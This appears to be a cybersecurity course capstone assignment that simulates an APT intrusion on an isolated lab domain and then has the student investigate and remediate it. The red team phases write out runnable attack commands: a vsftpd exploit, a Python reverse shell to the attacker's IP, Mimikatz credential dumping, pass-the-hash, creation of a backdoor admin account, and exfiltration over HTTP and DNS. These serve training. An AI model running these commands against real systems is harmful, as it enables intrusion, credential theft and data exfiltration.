jramos/seclab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
seclab/CAPSTONE_APT_Simulation.md

1091 lines
32 KiB
Markdown
Raw Permalink Normal View History

initial commit
2026-05-28 18:27:41 -06:00
# CAPSTONE PROJECT: Operation Serpent's Shadow
## Advanced Persistent Threat (APT) Simulation & Incident Response
**Duration**: 24-30 hours
**Points**: 200 (Red Team: 100pts, Blue Team: 100pts)
**Prerequisites**: MOD0-MOD8 completion
**Difficulty**: Advanced
---
## Executive Summary
**Operation Serpent's Shadow** is a comprehensive capstone exercise simulating a sophisticated APT campaign against the Apophis Networking infrastructure. You will first act as the **Red Team** executing a 7-phase attack campaign, then switch roles to become the **Blue Team** investigating and responding to your own intrusion.
This capstone tests your ability to:
- Execute complex multi-stage attacks using techniques from MITRE ATT&CK
- Maintain operational security while achieving attack objectives
- Detect, analyze, and respond to advanced threats
- Document findings in professional incident response reports
- Apply threat intelligence to real-world scenarios
**Scenario**: A nation-state APT group (codename: SERPENT SYNDICATE) has targeted Apophis Networking to steal intellectual property and maintain persistent access. You will emulate this threat actor, then hunt and remediate the intrusion.
---
## Learning Objectives
By completing this capstone, you will demonstrate:
1. **Red Team Skills**:
- Multi-phase attack chain execution (reconnaissance → persistence)
- Evasion of security controls (IDS/IPS, EDR simulation)
- Credential harvesting and lateral movement
- Data exfiltration techniques
- OPSEC and TTPs documentation
2. **Blue Team Skills**:
- Security log analysis across multiple sources (SIEM, firewall, endpoint)
- Intrusion detection and alert triage
- Digital forensics (disk, memory, network)
- Incident response lifecycle (NIST PICERL)
- Threat intelligence correlation (MITRE ATT&CK mapping)
- Remediation and hardening recommendations
3. **Professional Skills**:
- Technical report writing
- Timeline reconstruction
- Executive briefing creation
- Post-incident review documentation
---
## Lab Environment
### Network Topology
```
VLAN 100 (Management) : 10.10.1.0/24 - Proxmox, pfSense
VLAN 200 (Red Team) : 10.10.2.0/24 - Kali Linux
VLAN 300 (Blue Team) : 10.10.3.0/24 - Security Onion
VLAN 400 (Victim Network): 10.10.4.0/24 - Target Systems
```
### Target Systems (VLAN 400)
1. **DC01** (10.10.4.10) - Windows Server 2022 Domain Controller
- Domain: `apophis.local`
- Services: AD, DNS, LDAP, Kerberos
2. **WS01** (10.10.4.20) - Windows 10 Workstation (HR Department)
- Domain-joined
- User: `hruser` (Domain Users group)
3. **WS02** (10.10.4.21) - Windows 10 Workstation (IT Admin)
- Domain-joined
- User: `itadmin` (Domain Admins group - simulated compromised admin)
4. **WEB01** (10.10.4.30) - DVWA Web Server (Ubuntu + Docker)
- Services: HTTP (80), SSH (22), MySQL (3306)
5. **FILE01** (10.10.4.40) - Metasploitable 2 (Legacy File Server)
- Services: FTP (21), SMB (445), SSH (22)
### Attack Infrastructure (VLAN 200)
- **Kali Linux** (10.10.2.50)
- Tools: Nmap, Metasploit, Impacket, BloodHound, Responder, Mimikatz
### Monitoring Infrastructure (VLAN 300)
- **Security Onion** (10.10.3.100)
- SIEM: Kibana/Elasticsearch
- IDS/IPS: Suricata
- Network Forensics: Zeek (Bro), PCAP
---
## PHASE 1: RED TEAM OPERATION (100 Points)
### Pre-Engagement Checklist
Before starting the attack campaign:
1. **Create Attack VM Snapshot**: `Kali_PreAttack_Snapshot`
2. **Create Target VM Snapshots**: Snapshot all VLAN 400 systems
3. **Verify Network Isolation**: Confirm VLAN segmentation and firewall rules
4. **Start Security Onion**: Ensure all sensors are running
5. **Create Attack Log Directory**:
```bash
mkdir -p ~/capstone/red_team/{logs,screenshots,loot,exfil}
script ~/capstone/red_team/logs/attack_$(date +%Y%m%d_%H%M%S).log
```
---
### Attack Phase 1: External Reconnaissance (10 Points)
**Objective**: Map the external attack surface without triggering alerts.
**TTPs**: MITRE ATT&CK - TA0043 (Reconnaissance)
**Tasks**:
1. **Passive Reconnaissance**:
```bash
# Simulated OSINT gathering (document in report)
echo "apophis.local" > targets.txt
echo "10.10.4.0/24" >> targets.txt
# DNS enumeration (if DNS is exposed)
dig @10.10.4.10 apophis.local ANY
dig @10.10.4.10 apophis.local AXFR
```
2. **Active Network Scanning**:
```bash
# Stealthy host discovery (SYN scan, no ICMP)
sudo nmap -sS -Pn -T2 --max-retries 1 -oA recon/syn_scan 10.10.4.0/24
# Service enumeration on discovered hosts
sudo nmap -sV -sC -p- --open -T3 -oA recon/service_scan 10.10.4.0/24
```
3. **SMB/NetBIOS Enumeration**:
```bash
# Enumerate SMB shares and users
enum4linux -a 10.10.4.10 | tee recon/enum4linux_dc01.txt
smbclient -L //10.10.4.40 -N | tee recon/smbshares_file01.txt
```
**Deliverables**:
- [ ] Nmap scan results (XML + screenshot)
- [ ] Network topology diagram with discovered hosts/services
- [ ] Target prioritization list (justify choices)
**Assessment Criteria** (10pts):
- Comprehensive service enumeration (5pts)
- Evasion techniques documented (3pts)
- Target analysis and prioritization (2pts)
---
### Attack Phase 2: Initial Access (15 Points)
**Objective**: Gain initial foothold on the victim network.
**TTPs**: MITRE ATT&CK - TA0001 (Initial Access)
**Techniques**: T1190 (Exploit Public-Facing Application), T1078 (Valid Accounts)
**Scenario**: You discovered FILE01 (Metasploitable 2) running vulnerable vsftpd 2.3.4.
**Tasks**:
1. **Exploit vsftpd Backdoor** (from MOD3):
```bash
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.4.40
set PAYLOAD cmd/unix/interact
exploit
```
2. **Establish Meterpreter Session**:
```bash
# Upgrade to full Meterpreter shell
# (Use MSFVenom payload + upload via FTP if needed)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.2.50",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
3. **System Enumeration**:
```bash
# Gather system information
uname -a
id
cat /etc/passwd
cat /etc/shadow 2>/dev/null
netstat -tulpn
ls -la /home
```
**Deliverables**:
- [ ] Screenshot of successful exploit
- [ ] Output of system enumeration commands
- [ ] Screenshot showing `whoami` and `ifconfig` from victim
**Assessment Criteria** (15pts):
- Successful initial access (10pts)
- System enumeration completeness (3pts)
- Shell stability and upgrade (2pts)
---
### Attack Phase 3: Credential Access (15 Points)
**Objective**: Harvest credentials to enable lateral movement.
**TTPs**: MITRE ATT&CK - TA0006 (Credential Access)
**Techniques**: T1003 (OS Credential Dumping), T1110 (Brute Force)
**Tasks**:
1. **Linux Credential Harvesting** (FILE01):
```bash
# Dump /etc/shadow (if accessible)
cat /etc/shadow
# Search for credentials in config files
grep -ri password /var/www/html 2>/dev/null
grep -ri password /home 2>/dev/null
find / -name "*pass*" -type f 2>/dev/null | head -20
```
2. **Password Cracking**:
```bash
# Save hashes and crack with John
unshadow /tmp/passwd /tmp/shadow > /tmp/unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/unshadowed.txt
john --show /tmp/unshadowed.txt
```
3. **Web Application Credential Extraction** (WEB01):
```bash
# SQL injection to dump DVWA users (MOD7 techniques)
sqlmap -u "http://10.10.4.30/vulnerabilities/sqli/?id=1&Submit=Submit#" \
--cookie="PHPSESSID=<your-session>" \
--dump -D dvwa -T users
```
4. **Network Credential Sniffing** (Advanced):
```bash
# Responder for NTLM hash capture (if AD communication observed)
sudo responder -I eth0 -wrf
```
**Deliverables**:
- [ ] Cracked password list (at least 3 accounts)
- [ ] Screenshot of John the Ripper output
- [ ] Captured NTLM hashes (if applicable)
- [ ] SQL injection dump results
**Assessment Criteria** (15pts):
- Multiple credential sources exploited (7pts)
- Successful password cracking (5pts)
- Documentation of credential storage locations (3pts)
---
### Attack Phase 4: Lateral Movement (20 Points)
**Objective**: Pivot from initial foothold to domain-joined systems.
**TTPs**: MITRE ATT&CK - TA0008 (Lateral Movement)
**Techniques**: T1021.002 (SMB/Windows Admin Shares), T1550.002 (Pass the Hash)
**Scenario**: You obtained credentials for `itadmin` and need to access WS02.
**Tasks**:
1. **SMB Authentication Testing**:
```bash
# Test credentials against domain systems
crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --shares
crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --local-auth
```
2. **PSExec Lateral Movement**:
```bash
# Gain shell on WS02 using Impacket
impacket-psexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21'
# Alternative: WMIExec
impacket-wmiexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21'
```
3. **Kerberoasting Attack** (MOD5 techniques):
```bash
# Request service tickets for cracking
impacket-GetUserSPNs 'apophis.local/itadmin:P@ssw0rd123' -dc-ip 10.10.4.10 -request
# Crack TGS tickets
hashcat -m 13100 tgs_tickets.txt /usr/share/wordlists/rockyou.txt --force
```
4. **BloodHound Enumeration** (Advanced):
```bash
# Collect AD data
bloodhound-python -d apophis.local -u itadmin -p 'P@ssw0rd123' \
-ns 10.10.4.10 -c all
# Import into BloodHound GUI and analyze shortest path to Domain Admins
```
**Deliverables**:
- [ ] Screenshot of successful lateral movement to WS02
- [ ] CrackMapExec output showing access to multiple systems
- [ ] Kerberoast TGS tickets (if obtained)
- [ ] BloodHound attack path graph (screenshot)
**Assessment Criteria** (20pts):
- Successful lateral movement to domain system (10pts)
- Use of multiple techniques (5pts)
- Active Directory enumeration completeness (5pts)
---
### Attack Phase 5: Privilege Escalation & Persistence (20 Points)
**Objective**: Escalate to Domain Admin and establish persistent access.
**TTPs**: MITRE ATT&CK - TA0004 (Privilege Escalation), TA0003 (Persistence)
**Techniques**: T1068 (Exploitation for Privilege Escalation), T1136 (Create Account), T1547 (Boot/Logon Autostart)
**Tasks**:
1. **Mimikatz Credential Dumping** (WS02):
```powershell
# On compromised WS02 system
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::secrets
```
2. **Pass-the-Hash to Domain Controller**:
```bash
# Use captured NTLM hash to access DC01
impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'apophis.local/Administrator@10.10.4.10'
```
3. **Create Backdoor Domain Account**:
```powershell
# On DC01
net user backdoor P@ssw0rd123! /add /domain
net group "Domain Admins" backdoor /add /domain
net user backdoor
```
4. **Scheduled Task Persistence** (WS02):
```powershell
# Create scheduled task for Meterpreter callback
schtasks /create /tn "Windows Update Check" /tr "C:\Windows\Temp\update.exe" \
/sc onlogon /ru SYSTEM /f
```
5. **Registry Persistence** (Alternative):
```powershell
# Add Run key
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" \
/v SecurityUpdate /t REG_SZ /d "C:\Windows\Temp\update.exe" /f
```
**Deliverables**:
- [ ] Screenshot of Mimikatz credential dump
- [ ] Proof of Domain Admin access (screenshot of `whoami /groups` on DC01)
- [ ] Backdoor account creation evidence
- [ ] Persistence mechanism documentation (scheduled task/registry)
**Assessment Criteria** (20pts):
- Domain Admin privileges achieved (10pts)
- Credential dumping success (5pts)
- Persistence mechanisms installed (3pts)
- Stealth considerations documented (2pts)
---
### Attack Phase 6: Data Exfiltration (10 Points)
**Objective**: Locate and exfiltrate sensitive data.
**TTPs**: MITRE ATT&CK - TA0010 (Exfiltration)
**Techniques**: T1041 (Exfiltration Over C2 Channel), T1048 (Exfiltration Over Alternative Protocol)
**Tasks**:
1. **Data Discovery**:
```powershell
# Search for sensitive files
Get-ChildItem -Path C:\ -Include *.docx,*.xlsx,*.pdf -Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.Length -lt 10MB } |
Select-Object FullName, Length
# Search for "confidential" or "password" in file contents
findstr /si "password" C:\Users\*.txt C:\Users\*.docx
```
2. **Exfiltration via HTTP**:
```bash
# On Kali (setup listener)
sudo python3 -m http.server 8080
# On victim (download via curl/wget)
certutil -urlcache -f http://10.10.2.50:8080/file.zip C:\Windows\Temp\file.zip
```
3. **DNS Exfiltration** (Stealth technique):
```powershell
# Encode data in DNS queries (simulate)
$data = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("SECRET_DATA"))
nslookup "$data.attacker.com" 10.10.2.50
```
4. **Simulate Intellectual Property Theft**:
```powershell
# Create fake sensitive document on DC01
echo "Apophis Networking - Proprietary Research Data" > C:\Shares\Research\IP_Data.txt
# Compress and exfiltrate
Compress-Archive -Path C:\Shares\Research\* -DestinationPath C:\Windows\Temp\exfil.zip
# Transfer using Meterpreter 'download' command
```
**Deliverables**:
- [ ] List of discovered sensitive files (screenshot)
- [ ] Screenshot of successful exfiltration
- [ ] Network capture showing exfiltration traffic (PCAP)
- [ ] Exfiltrated file samples (in `~/capstone/red_team/exfil/`)
**Assessment Criteria** (10pts):
- Data discovery methodology (4pts)
- Successful exfiltration (4pts)
- Stealth techniques used (2pts)
---
### Attack Phase 7: Red Team Reporting (10 Points)
**Objective**: Document the attack chain for Blue Team analysis.
**Tasks**:
1. **Create Attack Timeline**:
- Document each phase with timestamps
- Include all commands executed
- Note which actions likely triggered alerts
2. **MITRE ATT&CK Mapping**:
- Map each technique to ATT&CK framework
- Create coverage matrix (Tactics vs Techniques)
- Export for dashboard integration
3. **Indicators of Compromise (IOCs)**:
- File paths created: `C:\Windows\Temp\update.exe`
- Registry keys modified: `HKLM\...\Run\SecurityUpdate`
- Network connections: `10.10.2.50:4444` (Meterpreter)
- User accounts created: `backdoor`
- Scheduled tasks: `Windows Update Check`
4. **Red Team Report Structure**:
```markdown
# Red Team Report: Operation Serpent's Shadow
## Executive Summary
- Attack duration: X hours
- Systems compromised: 5/5 (100%)
- Privileges gained: Domain Admin
- Data exfiltrated: XX MB
## Attack Chain
[Phase 1] External Recon → [Phase 2] Initial Access (FILE01) →
[Phase 3] Credential Harvesting → [Phase 4] Lateral Movement (WS02) →
[Phase 5] Domain Admin (DC01) + Persistence → [Phase 6] Data Exfiltration
## Techniques Used
[MITRE ATT&CK mapping table]
## Indicators of Compromise
[IOC list]
## Detection Gaps Identified
[Where Blue Team should have caught you]
```
**Deliverables**:
- [ ] Complete Red Team report (PDF format)
- [ ] MITRE ATT&CK Navigator JSON file
- [ ] IOC list (CSV format)
- [ ] Complete command log from `script` session
**Assessment Criteria** (10pts):
- Report completeness and professionalism (5pts)
- Accurate MITRE ATT&CK mapping (3pts)
- Comprehensive IOC documentation (2pts)
---
## PHASE 2: BLUE TEAM OPERATION (100 Points)
### Pre-Investigation Checklist
Before starting the Blue Team phase:
1. **Preserve Evidence**:
- Create forensic snapshots of all compromised VMs
- Copy Security Onion logs: `/nsm/sensor_data/`
- Export SIEM data from Kibana (last 24 hours)
2. **Establish Blue Team Workspace**:
```bash
mkdir -p ~/capstone/blue_team/{forensics,pcaps,logs,reports,timeline}
script ~/capstone/blue_team/logs/investigation_$(date +%Y%m%d_%H%M%S).log
```
3. **Review Red Team Report** (IOCs only - not methodology yet):
- Extract IOC list to use as detection baseline
- Do NOT review attack methodology - simulate real-world blind investigation
---
### Investigation Phase 1: Detection & Triage (15 Points)
**Objective**: Identify security alerts and determine scope of compromise.
**Tasks**:
1. **SIEM Alert Review** (Security Onion Kibana):
```kql
# High severity alerts in last 24 hours
event.severity: high OR event.severity: critical
| stats count by rule.name, source.ip, destination.ip
# Suspicious network connections to VLAN 200
destination.ip: 10.10.2.* AND event.category: network
# Authentication anomalies
event.category: authentication AND event.outcome: failure
| stats count by user.name, source.ip
```
2. **Suricata Alert Analysis**:
```bash
# Review IDS alerts
sudo cat /var/log/suricata/fast.log | grep -E "ET|MALWARE|EXPLOIT"
# Extract unique alert signatures
jq -r '.alert.signature' /var/log/suricata/eve.json | sort -u
```
3. **Zeek Log Analysis**:
```bash
# Identify unusual connections
zeek-cut id.orig_h id.resp_h id.resp_p proto < /nsm/zeek/logs/current/conn.log |
sort | uniq -c | sort -rn | head -20
# DNS queries to suspicious domains
zeek-cut query answers < /nsm/zeek/logs/current/dns.log | grep -v ".local"
```
4. **Initial Hypothesis**:
- Document which systems appear compromised
- Identify likely attack entry point
- Estimate timeline of initial compromise
**Deliverables**:
- [ ] Top 10 critical alerts (screenshot)
- [ ] Network connection matrix (source → dest mapping)
- [ ] Initial incident triage report (1-2 pages)
**Assessment Criteria** (15pts):
- Alert prioritization and triage (7pts)
- Correct identification of compromised systems (5pts)
- Timeline accuracy (3pts)
---
### Investigation Phase 2: Network Forensics (15 Points)
**Objective**: Analyze network traffic to reconstruct attack activities.
**Tasks**:
1. **PCAP Analysis** (Wireshark):
```bash
# Export suspicious traffic from Security Onion
sudo tcpdump -r /nsm/sensor_data/securityonion-eth1/dailylogs/*.pcap \
'host 10.10.2.50 or host 10.10.4.40' \
-w ~/capstone/blue_team/pcaps/attack_traffic.pcap
```
2. **Identify C2 Communication**:
- Filter for connections to Kali (10.10.2.50)
- Look for Meterpreter beacons (TCP 4444, HTTP reverse shells)
- Identify exfiltration channels
3. **Extract Artifacts from PCAP**:
```bash
# Export HTTP objects (potential exfil data)
tshark -r attack_traffic.pcap --export-objects http,/tmp/http_objects/
# SMB file transfers
tshark -r attack_traffic.pcap -Y "smb2.cmd == 0x0009" -T fields \
-e frame.time -e ip.src -e ip.dst -e smb2.filename
```
4. **Protocol Analysis**:
- Document SMB sessions (lateral movement)
- Kerberos TGT/TGS requests (Kerberoasting)
- DNS queries (potential DNS tunneling)
- HTTP POST requests (data exfiltration)
**Deliverables**:
- [ ] Annotated PCAP with attack traffic highlighted
- [ ] Screenshot of C2 communication in Wireshark
- [ ] Extracted artifacts (HTTP objects, SMB files)
- [ ] Network forensics report (protocol breakdown)
**Assessment Criteria** (15pts):
- Correct identification of attack traffic (7pts)
- C2 channel analysis (5pts)
- Artifact extraction completeness (3pts)
---
### Investigation Phase 3: Host Forensics (20 Points)
**Objective**: Perform disk and memory forensics on compromised systems.
**Tasks**:
1. **Disk Forensics with Autopsy** (FILE01 - Initial Access Point):
```bash
# Create disk image
sudo dd if=/dev/sda of=~/capstone/blue_team/forensics/file01.dd bs=4M status=progress
# Import into Autopsy and analyze:
# - Timeline of file modifications
# - Deleted files recovery
# - Web history / bash history
# - Malware artifacts
```
2. **Memory Forensics with Volatility** (WS02 - Lateral Movement Target):
```bash
# Capture memory dump (from Proxmox or use FTK Imager)
# Analyze with Volatility 3
python3 vol.py -f ws02_memory.raw windows.info
python3 vol.py -f ws02_memory.raw windows.pslist
python3 vol.py -f ws02_memory.raw windows.netscan
python3 vol.py -f ws02_memory.raw windows.malfind
python3 vol.py -f ws02_memory.raw windows.dumpfiles --pid <suspicious_pid>
```
3. **Windows Event Log Analysis** (DC01):
```powershell
# Security event logs (authentication)
Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4624 or EventID=4625 or EventID=4672]]" |
Where-Object { $_.TimeCreated -gt (Get-Date).AddHours(-24) } |
Select-Object TimeCreated, Id, Message
# Logon events (type 3 = network, type 10 = remote interactive)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} |
Where-Object { $_.Properties[8].Value -eq 3 -or $_.Properties[8].Value -eq 10 }
# Account creation events
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4720}
```
4. **Registry Forensics** (Persistence Mechanisms):
```powershell
# Check Run keys
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
# Scheduled tasks
Get-ScheduledTask | Where-Object { $_.Principal.UserId -eq "SYSTEM" } |
Select-Object TaskName, TaskPath, Date
# Services
Get-Service | Where-Object { $_.StartType -eq "Automatic" -and $_.Status -eq "Running" }
```
**Deliverables**:
- [ ] Autopsy case report with timeline
- [ ] Volatility analysis results (processes, network connections)
- [ ] Windows Event Log summary (authentication anomalies)
- [ ] Registry forensics findings (persistence mechanisms)
**Assessment Criteria** (20pts):
- Disk forensics completeness (7pts)
- Memory forensics quality (7pts)
- Event log analysis (4pts)
- Persistence mechanism identification (2pts)
---
### Investigation Phase 4: Incident Response (NIST PICERL) (20 Points)
**Objective**: Execute full incident response lifecycle.
**NIST PICERL Framework**:
1. **Preparation** (Already completed - lab setup)
2. **Identification** (Completed in Phase 1)
3. **Containment** (Short-term and Long-term)
4. **Eradication** (Remove attacker presence)
5. **Recovery** (Restore services)
6. **Lessons Learned** (Post-incident review)
**Tasks**:
1. **Containment Actions**:
```bash
# Short-term: Isolate compromised systems
# On pfSense, block Kali IP
pfctl -t blocklist -T add 10.10.2.50
# Disable backdoor account
net user backdoor /active:no
# Kill suspicious processes (on WS02)
Get-Process | Where-Object { $_.Path -like "*\Temp\*" } | Stop-Process -Force
```
2. **Eradication**:
```powershell
# Remove malware artifacts
Remove-Item "C:\Windows\Temp\update.exe" -Force
# Remove persistence mechanisms
schtasks /delete /tn "Windows Update Check" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SecurityUpdate /f
# Delete backdoor account
net user backdoor /delete /domain
# Reset compromised accounts
net user itadmin NewP@ssw0rd123! /domain
```
3. **Recovery**:
```powershell
# Restore from clean snapshots (if available)
# Rebuild compromised systems
# Verify AD integrity
dcdiag /v > dcdiag_output.txt
repadmin /replsummary
# Reset Kerberos keys
ksetup /setenctypeattr apophis.local AES256-CTS-HMAC-SHA1-96
```
4. **Hardening Recommendations**:
- Enable LSASS protection: `Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1`
- Implement tiered admin model
- Deploy EDR solution (simulate with Sysmon)
- Update firewall rules (segment VLANs further)
**Deliverables**:
- [ ] Containment action log (timestamped)
- [ ] Eradication checklist (completed tasks)
- [ ] System recovery documentation
- [ ] Hardening recommendations report (5+ actionable items)
**Assessment Criteria** (20pts):
- Proper NIST PICERL execution (10pts)
- Completeness of eradication (5pts)
- Quality of hardening recommendations (5pts)
---
### Investigation Phase 5: Threat Intelligence & Attribution (15 Points)
**Objective**: Map attack to MITRE ATT&CK and perform threat actor profiling.
**Tasks**:
1. **MITRE ATT&CK Mapping**:
- Create spreadsheet mapping observed TTPs to ATT&CK techniques
- Use ATT&CK Navigator to visualize coverage
- Identify gaps in detection coverage
2. **Threat Actor Profiling**:
```markdown
# Threat Actor: SERPENT SYNDICATE (Simulated APT)
**Sophistication Level**: Advanced
**Observed TTPs**:
- Initial Access: T1190 (Exploit Public-Facing Application)
- Credential Access: T1003 (OS Credential Dumping)
- Lateral Movement: T1021.002 (SMB/Windows Admin Shares)
- Persistence: T1136 (Create Account), T1053 (Scheduled Task)
- Exfiltration: T1041 (C2 Channel)
**Tools Used**:
- Metasploit Framework
- Impacket suite
- Mimikatz
- Custom PowerShell scripts
**Targeting**: Intellectual property theft, persistent access
**Comparison**: Similar to APT29 (Cozy Bear) - use of living-off-the-land techniques
```
3. **IOC Generation for Threat Intelligence Platforms**:
```csv
indicator,type,severity,context
10.10.2.50,ipv4,high,C2 Server
update.exe,filename,critical,Persistent malware
backdoor,username,critical,Rogue domain account
"Windows Update Check",scheduled_task,high,Persistence mechanism
C:\Windows\Temp\*,filepath,medium,Malware staging directory
```
4. **Dashboard Integration** (MOD8 Link):
- Export MITRE heatmap JSON to `dashboard/src/data/live/mitre_coverage.json`
- Update threat feed with real IOCs
- Visualize attack timeline in Incident Tracker component
**Deliverables**:
- [ ] MITRE ATT&CK Navigator layer file (JSON)
- [ ] Threat actor profile report (2-3 pages)
- [ ] IOC list in STIX format (or CSV)
- [ ] Dashboard integration (screenshot of updated heatmap)
**Assessment Criteria** (15pts):
- Accurate MITRE ATT&CK mapping (7pts)
- Threat actor profiling quality (5pts)
- IOC quality and completeness (3pts)
---
### Investigation Phase 6: Final IR Report (15 Points)
**Objective**: Create comprehensive incident response report for executive leadership.
**Report Structure** (Use `LAB_REPORT_TEMPLATE.md` as base):
```markdown
# Incident Response Report: Operation Serpent's Shadow
## Security Incident #2026-001
**Classification**: CONFIDENTIAL
**Date**: [Current Date]
**Incident Handler**: [Your Name]
**Severity**: CRITICAL
---
## Executive Summary (1 page)
- **What Happened**: Brief overview of the incident
- **Impact**: Systems compromised, data exfiltrated
- **Root Cause**: Unpatched vsftpd vulnerability on legacy server
- **Remediation Status**: All threats eradicated, systems hardened
- **Recommendation**: Decommission FILE01, implement vulnerability management program
---
## Incident Timeline (2-3 pages)
| Timestamp | Event | System | Action |
|-----------|-------|--------|--------|
| 2026-02-10 14:23 | Initial scan detected | FILE01 | Suricata alert fired |
| 2026-02-10 14:45 | vsftpd exploit successful | FILE01 | Attacker gained shell |
| ... | ... | ... | ... |
---
## Technical Analysis (5-7 pages)
### Attack Chain
[Detailed walkthrough of each attack phase]
### Network Forensics
[PCAP analysis findings]
### Host Forensics
[Autopsy/Volatility findings]
### MITRE ATT&CK Mapping
[Table of techniques used]
---
## Indicators of Compromise (1 page)
[Complete IOC list]
---
## Response Actions (2-3 pages)
### Containment
[What was done to stop the attack]
### Eradication
[How threats were removed]
### Recovery
[How systems were restored]
---
## Lessons Learned (2 pages)
### What Went Well
- IDS detected initial scanning activity
- Log retention allowed full forensic analysis
### What Could Be Improved
- Delayed response to initial alerts (simulated)
- Legacy system not in patch management program
- No EDR on endpoints
### Recommendations
1. Implement 24/7 SOC monitoring
2. Deploy EDR across all endpoints
3. Decommission Metasploitable 2 (FILE01)
4. Conduct quarterly red team exercises
5. Implement tiered admin model
---
## Appendices
- Appendix A: Complete IOC List
- Appendix B: MITRE ATT&CK Navigator JSON
- Appendix C: Network Topology Diagram
- Appendix D: Forensic Evidence Inventory
```
**Deliverables**:
- [ ] Final IR report (PDF, 15-20 pages)
- [ ] Executive briefing (PowerPoint, 5-7 slides)
- [ ] Complete evidence package (ZIP archive)
- [ ] Post-incident review presentation
**Assessment Criteria** (15pts):
- Report professionalism and completeness (7pts)
- Technical accuracy (5pts)
- Actionable recommendations (3pts)
---
## Final Deliverables Checklist
### Red Team Package (50 Points)
- [ ] Attack command logs (`script` output)
- [ ] Screenshots (minimum 15)
- [ ] Red Team report (PDF)
- [ ] MITRE ATT&CK Navigator JSON
- [ ] IOC list (CSV)
- [ ] Exfiltrated data samples
### Blue Team Package (50 Points)
- [ ] Investigation logs
- [ ] Forensic images (disk + memory)
- [ ] PCAP files with annotations
- [ ] Incident Response report (PDF)
- [ ] Executive briefing (PPTX)
- [ ] Remediation documentation
- [ ] Dashboard integration (screenshots)
### Submission Format
Create ZIP archive: `CAPSTONE_YourName_OperationSerpentsShadow.zip`
```
CAPSTONE_YourName_OperationSerpentsShadow/
├── 01_Red_Team/
│ ├── logs/
│ ├── screenshots/
│ ├── loot/
│ ├── exfil/
│ ├── RedTeam_Report.pdf
│ └── MITRE_ATT&CK_Layer.json
├── 02_Blue_Team/
│ ├── forensics/
│ ├── pcaps/
│ ├── logs/
│ ├── IR_Report.pdf
│ ├── Executive_Briefing.pptx
│ └── Remediation_Plan.md
└── README.md (submission summary)
```
---
## Assessment Rubric
### Red Team Assessment (100 Points)
| Phase | Criteria | Points |
|-------|----------|--------|
| Phase 1: Recon | Service enumeration completeness | 10 |
| Phase 2: Initial Access | Successful exploitation | 15 |
| Phase 3: Credential Access | Multiple credential sources | 15 |
| Phase 4: Lateral Movement | Domain system compromise | 20 |
| Phase 5: Privilege Escalation | Domain Admin achieved | 20 |
| Phase 6: Exfiltration | Data extraction success | 10 |
| Phase 7: Reporting | Documentation quality | 10 |
### Blue Team Assessment (100 Points)
| Phase | Criteria | Points |
|-------|----------|--------|
| Phase 1: Detection | Alert triage accuracy | 15 |
| Phase 2: Network Forensics | PCAP analysis quality | 15 |
| Phase 3: Host Forensics | Disk/memory analysis | 20 |
| Phase 4: Incident Response | NIST PICERL execution | 20 |
| Phase 5: Threat Intelligence | MITRE ATT&CK mapping | 15 |
| Phase 6: Final Report | Professional documentation | 15 |
### Total: 200 Points
**Grading Scale**:
- 180-200: Exceptional (A)
- 160-179: Excellent (B)
- 140-159: Good (C)
- Below 140: Needs Improvement (Resubmit)
---
## Additional Resources
### Recommended Reading
- MITRE ATT&CK Framework: https://attack.mitre.org
- NIST SP 800-61r2 (Incident Response Guide)
- SANS Incident Response Poster
- Red Team Field Manual (RTFM)
- Blue Team Field Manual (BTFM)
### Tools Reference
- **Red Team**: Metasploit, Impacket, Mimikatz, BloodHound, CrackMapExec
- **Blue Team**: Volatility 3, Autopsy, Wireshark, Zeek, Suricata, KQL
### Dashboard Integration
- Export MITRE coverage: `dashboard/src/data/live/mitre_coverage.json`
- Update threat feed: `dashboard/src/data/live/threat_feed.json`
- Timeline visualization: Use `Recharts` LineChart component
---
## Post-Capstone Next Steps
After completing this capstone:
1. **Rebuild Lab Environment**: Reset all VMs to clean state
2. **Apply Hardening**: Implement your own remediation recommendations
3. **Re-Attack**: Attempt the same attack chain - what changed?
4. **Advanced Scenarios**: Try different attack paths (web app → AD, phishing simulation)
5. **Contribute to Dashboard**: Add real detection logic to React components
---
## Academic Integrity Statement
This capstone represents your own work and understanding of offensive and defensive security operations. You may use:
- Official tool documentation
- MITRE ATT&CK knowledge base
- Course module materials (MOD0-MOD8)
You may NOT:
- Copy attack scripts without understanding them
- Use automated red team frameworks (Cobalt Strike, Covenant) - manual techniques only
- Plagiarize reports from online sources
**Authorized Use Only**: These techniques are for educational purposes in a controlled lab environment. Unauthorized use against systems you do not own or have explicit permission to test is illegal.
---
## Contact & Support
For technical issues:
- Review module materials (MOD0-MOD8)
- Check `LAB_REPORT_TEMPLATE.md` for report formatting
- Consult `ASSESSMENT_RUBRICS.md` for grading criteria
**Good luck, and remember**: "Order from Chaos" 🐍
---
**END OF CAPSTONE PROJECT**
Reference in New Issue Copy Permalink